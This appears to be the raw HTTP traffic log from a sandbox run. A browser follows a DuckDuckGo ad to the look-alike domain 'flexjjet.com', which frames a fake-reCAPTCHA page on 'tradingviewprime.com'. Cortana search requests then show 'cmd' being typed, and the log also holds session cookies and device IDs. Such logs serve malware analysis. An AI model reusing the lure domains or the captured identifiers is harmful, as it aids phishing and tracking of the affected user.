Source: global traffic	HTTP traffic detected: GET /font/ProximaNova-ExtraBold-webfont.woff2 HTTP/1.1host: duckduckgo.comorigin: https://duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: fontreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: same-originsec-fetch-mode: corssec-fetch-dest: emptyreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/fe21b530ba74e4553643.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/212874b7047e393bacb8.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/23d563f964108cbb5b74.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /assets/icons/related/loupe-grey.svg HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /assets/icons/favicons/wikipedia.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /opensearch.xml?atb=v485-6__ HTTP/1.1host: duckduckgo.comsec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: emptyuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4, i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/96adebdbdbc5d4e75d7f.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /dist/react-assets/0557b8fc0e7117648c6b.gif HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /i/71bff817ed59c3bf.png HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /y.js?ifu=%7B3%7Dappid%3D055AAD1BA669BEB8B048128DC89A107C678B527B%26rguid%3Dece6ed60509a42b38bb78814f9f00f32&iurl=%7B2%7DIG%3DC0D1F839EA664342A210C610688ECCC8%26CID%3D1AD6F6DB0D996C732D74E0DD0C816D26%26Type%3DEvent.CPT%26DATA%3D0&impr=1m%3A42%3B52%3B56%3B43%250945%255B44%255D%250947%255B46%255D%250949%255B48%255D%250951%255B50%255D%7C5b%3A57%3B79%3B58%250960%255B59%255D%250962%255B61%255D%250964%255B63%255D%250966%255B65%255D&rvf=5&adUnitIndex=8&aba=0 HTTP/1.1host: duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /iu/?u=https%3A%2F%2Fwww.bing.com%2Fth%3Fid%3DOADD2.7971501094202_1ZTQBC2WZV07776MFH%26pid%3D21.2%26h%3D32&f=1 HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/aeroplane.biz.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/www2.flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-sitesec-fetch-mode: no-corssec-fetch-dest: imagereferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: i
Source: global traffic	HTTP traffic detected: GET /ip3/simpleflying.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/privatejetcardcomparisons.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /ip3/flexjet.com.ico HTTP/1.1host: external-content.duckduckgo.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /lander/flexjet/Flexjet%20_%20Private%20Jet%20Company%20_%20Aircraft%20Ownership%20_%20Leasing_files/video-js.min.css HTTP/1.1host: flexjjet.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: stylereferer: https://flexjjet.com/?type=3accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6scookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDMsXCIzMzRcIjoxNzQ5NTAyMDY2fSxcImNhbXBhaWduc1wiOntcIjExM1wiOjE3NDk1MDIwNDN9LFwidGltZVwiOjE3NDk1MDIwNDN9In0.-yxM_jtNUdCm4aGDn10UCznT9MukIp53FTP7S7YVnBspriority: u=0
Source: global traffic	HTTP traffic detected: GET /?type=3 HTTP/1.1host: flexjjet.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: documentreferer: https://duckduckgo.com/accept-encoding: identityaccept-language: en-US,en;q=0.9cookie: _subid=33rpbio8in6ecookie: 7f3b8=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1wic3RyZWFtc1wiOntcIjMzMlwiOjE3NDk1MDIwNDN9LFwiY2FtcGFpZ25zXCI6e1wiMTEzXCI6MTc0OTUwMjA0M30sXCJ0aW1lXCI6MTc0OTUwMjA0M30ifQ.io15MZ8hAmszvEd6-fhL5GBD-J4okyPU3j_xJ2ROQAEpriority: u=0, i
Source: global traffic	HTTP traffic detected: GET /lander/tradingview/index.html HTTP/1.1host: tradingviewprime.comsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"upgrade-insecure-requests: 1user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7sec-fetch-site: cross-sitesec-fetch-mode: navigatesec-fetch-user: ?1sec-fetch-dest: iframesec-fetch-storage-access: activereferer: https://flexjjet.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0, i
Source: global traffic	HTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://tradingviewprime.com/lander/tradingview/index.htmlaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2, i
Source: global traffic	HTTP traffic detected: GET /releases/v5.0.0/css/all.css HTTP/1.1host: use.fontawesome.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,/;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: stylesec-fetch-storage-access: activereferer: https://tradingviewprime.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
Source: global traffic	HTTP traffic detected: GET /releases/v5.0.0/webfonts/fa-brands-400.woff2 HTTP/1.1host: use.fontawesome.comorigin: https://tradingviewprime.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: /sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: fontreferer: https://use.fontawesome.com/releases/v5.0.0/css/all.cssaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=4
Source: global traffic	HTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: /sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic	HTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=a279da2c5b244124869f757b83905435&ig=6cba30e9930b49e88e3d60ffd1f169de HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=a279da2c5b244124869f757b83905435&ig=a1891a94c2e8473fbfd7c148f4f4eab0 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
Source: global traffic	HTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=a279da2c5b244124869f757b83905435&ig=980d29b949644590b7a121cb5baedd13 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: /accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
Source: global traffic	HTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic	HTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: /referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
